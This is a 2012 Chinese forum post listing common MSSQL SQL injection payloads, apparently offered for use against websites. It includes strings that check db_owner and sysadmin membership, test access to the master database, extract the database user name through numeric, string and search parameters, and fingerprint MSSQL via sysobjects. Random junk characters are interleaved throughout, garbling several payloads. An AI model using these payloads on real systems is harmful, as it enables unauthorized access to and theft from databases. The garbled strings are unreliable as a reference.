标题: 常用的一些注入命令 [打印本页] 作者: admin 时间: 2012-9-15 14:40 标题: 常用的一些注入命令 //看看是什么权限的 ! Q0 S9 j5 P; [1 oand 1=(Select IS_MEMBER('db_owner'))0 x9 Y" G g* | d4 [
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--, B/ X$ }' f7 G$ f h
# P; ]& ]. X" d/ c k//检测是否有读取某数据库的权限 0 J. U F% Q5 ], ~* v, j5 p3 g% Tand 1= (Select HAS_DBACCESS('master')) * H6 I6 W. d3 y9 z, B$ k# xAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- 3 j8 p: U7 t1 U1 N% a 6 R4 f+ |, l" y' o9 N* B6 v( \. ]; S! T% ?% \8 ~* ?
数字类型7 N: D) r" q, T2 e
and char(124)%2Buser%2Bchar(124)=0 * L. _! |+ f& v+ c) S4 b' C* l( i8 D' U/ O
字符类型 1 F1 t" _5 C" C1 K0 b' and char(124)%2Buser%2Bchar(124)=0 and ''=' * }& }( U5 o2 w% p$ j, `. i$ ~4 D. E9 K& ]' P( E
搜索类型 . C6 {& @% m/ V" X' and char(124)%2Buser%2Bchar(124)=0 and '%'='/ ]: E, E3 b7 Q5 i
- Y' h B# g" b8 r9 R. b
爆用户名 ' G0 f" M) z: G# D- D2 e7 Oand user>06 D: L. c% [8 \* y- D
' and user>0 and ''='# }5 W6 U8 o+ W# x% ?% N
7 T Z2 ~3 T/ S c7 B% w
检测是否为SA权限& K8 y- g: F9 V$ d. T
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--' L; m, s5 c& R x" Q) Y: ~) ?9 l
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --" D) S9 u! U% S: O1 W- ?/ b; b6 U( S
' S- \3 }% z! O/ z6 U检测是不是MSSQL数据库/ z" G# r9 @4 ]4 F, F9 M6 x
and exists (select * from sysobjects);--# e$ z0 a8 u: I9 A